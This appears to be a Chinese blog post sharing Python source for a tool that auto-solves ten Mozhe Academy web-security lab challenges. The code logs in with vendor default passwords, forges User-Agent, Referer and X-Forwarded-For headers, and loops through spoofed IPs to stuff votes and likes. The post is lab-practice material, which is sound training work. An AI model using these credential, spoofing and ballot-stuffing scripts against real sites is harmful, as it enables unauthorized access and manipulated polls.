前言:
墨者学院是一个用于安全学习的网站,其中的在线网络安全攻防技能实训靶场极具特色。
- 最近做了一下网络安全类的题,但用brupsuit不满足的我决定写一个自动解题的程序
链接:https://pan.baidu.com/s/1yhE5395g12xvkv4F1FGvyA
提取码:mvjr
简单演示:
- 进入一个靶场,并启动环境
- 启动InsectBaby.exe,并依次填入对应的题号、IP、端口
- 随后提交输出的key值即可
- 除了几道靠刷请求的题需要30~60秒,其他的都是秒解,所以在座的速度之王们还在等什么?
- 如果实在太久,有可能是请求阻塞了,建议重新运行一下程序
源码:
#某防火墙默认口令
def topic_1(ip,port):
url = "http://{}:{}/login.php".format(ip, port)
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "53",
"Origin": "http://{}:{}".format(ip, port),
"Connection": "close",
"Referer": "http://{}:{}/login.html".format(ip, port),
"Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6; verification=89a5b242c7f88765bd270c6cce92328f",
"Upgrade-Insecure-Requests": "1", }
# 产品默认口令收集
data = {'usr': 'useradmin',
'pwd': 'venus.user',
'validate': 't2fa',
'language': '1'}
response = requests.post(url=url, headers=headers, data=data)
if response.status_code == 200:
key = re.findall("KEY:\n\n(.*?)\n\n</p>", response.content.decode("utf-8"))
return key[0]
else:
return
#浏览器信息伪造
def topic_2(ip,port):
host = "http://{}:{}/".format(ip,port)
url = host + 'mp_weixin_qq_com.php'
# 伪造User-Agent
headers = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/2G',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Referer': host,
'Upgrade-Insecure-Requests': '1'}
response = requests.get(url=url, headers=headers)
if response.status_code == 200:
return response.content.decode("utf-8")
else:
return
#HTTP动作练习
def topic_3(ip,port):
get_context_url = "http://{}:{}/".format(ip,port)
get_key_url = "http://{}:{}/".format(ip,port) + "//info.php"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Referer': 'http://124.70.71.251:46166/',
'Upgrade-Insecure-Requests': '1', }
get_context_response = requests.get(url=get_context_url, headers=headers)
response_txt = get_context_response.content.decode("utf-8")
soup = BeautifulSoup(response_txt, 'html.parser')
link_context = soup.select('h4[class="weui_media_title"]')
link_context2 = str(link_context[0])
link_context3 = link_context2.replace('<h4 class="weui_media_title"><a href="info.php?content=', '')
context = link_context3.replace('" style="color: #000">静夜思</a>\n</h4>', '')
data = {'content': context}
headers['Content-Type'] = 'application/x-www-form-urlencoded'
headers['Content-Length'] = '9966'
#POST的请求体用data来表示
response = requests.post(url=get_key_url, headers=headers, data=data)
if response.status_code == 200:
return response.content.decode("utf-8")
else:
return
#热点评论刷分漏洞分析溯源
def topic_4(ip,port):
url = "http://{}:{}/like_do.php".format(ip, port)
key_url = "http://{}:{}/news_comment.php".format(ip, port)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}
data = {'id': '7'}
if requests.get(url=key_url, headers=headers).status_code != 200:
return
else:
for i in range(1, 3):
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Content-Length": "4",
"Origin": "http://{}:{}".format(ip, port),
"X-FORWARDED-FOR": "",
"Connection": "close",
"Referer": key_url}
for j in range(101, 211):
headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)
while True:
try:
requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)
print("\r正在解题,请耐心等待", end='')
break
except:
print("\r{}".format("●"), end='')
time.sleep(5)
continue
headers['X-FORWARDED-FOR'] = '192.168.2.212'
# 还差一票,超越500
requests.post(url=url, headers=headers, data=data)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}
response = requests.get(url=key_url, headers=headers)
key = re.findall("KEY:(.*?)'", response.content.decode("utf-8"))
return key[0]
#投票常见漏洞分析溯源
def topic_5(ip,port):
url = "http://{}:{}/wx_vote_do.php".format(ip, port)
key_url = "http://{}:{}/wx_vote.php".format(ip, port)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}
data = {'id': '6'}
if requests.get(url=key_url, headers=headers).status_code != 200:
return
else:
for i in range(1, 3):
headers = {
"User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365 MicroMessenger/6.0 NetType/WIFI",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Content-Length": "4",
"Origin": "http://{}:{}".format(ip, port),
"X-FORWARDED-FOR": "",
"Connection": "close",
"Referer": key_url,
"Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6"}
for j in range(101, 247):
headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)
while True:
try:
requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)
print("\r正在解题,请耐心等待", end='')
break
except:
print("\r{}".format("●"), end='')
time.sleep(5)
continue
headers['X-FORWARDED-FOR'] = '192.168.2.247'
# 还差一票,获得第一名
requests.post(url=url, headers=headers, data=data)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}
response = requests.get(url=key_url, headers=headers)
key = re.findall("key:(.*?)'", response.content.decode("utf-8"))
return key[0]
#来源页伪造
def topic_6(ip,port):
url = 'http://{}:{}/x_search_index.php'.format(ip,port)
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language':'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding':'gzip, deflate',
'Connection':'close',
'Referer':'http://google.com', # 伪造referer
'Upgrade-Insecure-Requests':'1'}
response = requests.get(url=url,headers=headers)
if response.status_code == 200:
key = response.content.decode("utf-8")
print(key)
return True
else:
return
#投票系统程序设计缺陷分析
def topic_7(ip,port):
url = "http://{}:{}/vote_do.php".format(ip, port)
key_url = "http://{}:{}/vote.php".format(ip, port)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}
data = {'id': '7'}
if requests.get(url=key_url, headers=headers).status_code != 200:
return
else:
for i in range(1, 3):
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Content-Length": "4",
"Origin": "http://{}:{}".format(ip, port),
"X-FORWARDED-FOR": "",
"Connection": "close",
"Referer": key_url}
for j in range(101, 232):
headers['X-FORWARDED-FOR'] = '192.168.{}.{}'.format(i, j)
while True:
try:
requests.post(url=url, headers=headers, data=data, timeout=(30, 50), verify=False)
print("\r正在解题,请耐心等待", end='')
break
except:
print("\r{}".format("●"), end='')
time.sleep(5)
continue
headers['X-FORWARDED-FOR'] = '192.168.2.232'
#还差一票,获得第一名
requests.post(url=url, headers=headers, data=data)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"}
response = requests.get(url=key_url, headers=headers)
key = re.findall("key:(.*?)'", response.content.decode("utf-8"))
return key[0]
#IP地址伪造(第1题)
def topic_8(ip,port):
url = "http://{}:{}/login.php".format(ip, port)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "43",
"Origin": "http://{}:{}".format(ip, port),
"X-FORWARDED-FOR": "127.0.0.1",
"Connection": "close",
"Referer": "http://{}:{}/".format(ip, port),
"Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6",
"Upgrade-Insecure-Requests": "1"}
#产品默认口令收集
data = {'action': 'login',
'user_name': 'admin',
'Password': 'admin'}
response = requests.post(url=url, headers=headers, data=data)
if response.status_code == 200:
key = response.content.decode('utf-8')
print(key)
return True
else:
return
#IP地址伪造(第2题)
def topic_9(ip,port):
url = 'http://{}:{}/login.php'.format(ip, port)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "41",
"Origin": "http://{}:{}".format(ip, port),
"X-FORWARDED-FOR": "59.125.39.5",
"Connection": "close",
"Referer": "http://{}:{}/".format(ip, port),
"Cookie": "PHPSESSID=oi107g0esb2ddjjvqf3kq4ubj6",
"Upgrade-Insecure-Requests": "1", }
#Burp实战中,使用弱口令爆破
data = {'action': 'login',
'user_name': 'test',
'Password': 'test'}
response = requests.post(url=url, headers=headers, data=data)
if response.status_code == 200:
key = response.content.decode('utf-8')
print(key)
return True
else:
return
#服务器返回数据查看
def topic_10(ip,port):
url = "http://{}:{}/".format(ip, port)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "13",
"Origin": "http://{}:{}".format(ip, port),
"Connection": "close",
"Referer": "http://{}:{}/".format(ip, port),
"Upgrade-Insecure-Requests": "1"}
data = {'boolean': 'false'}
response = requests.post(url=url, headers=headers, data=data)
if response.status_code == 200:
key = response.headers['key']
return key
else:
return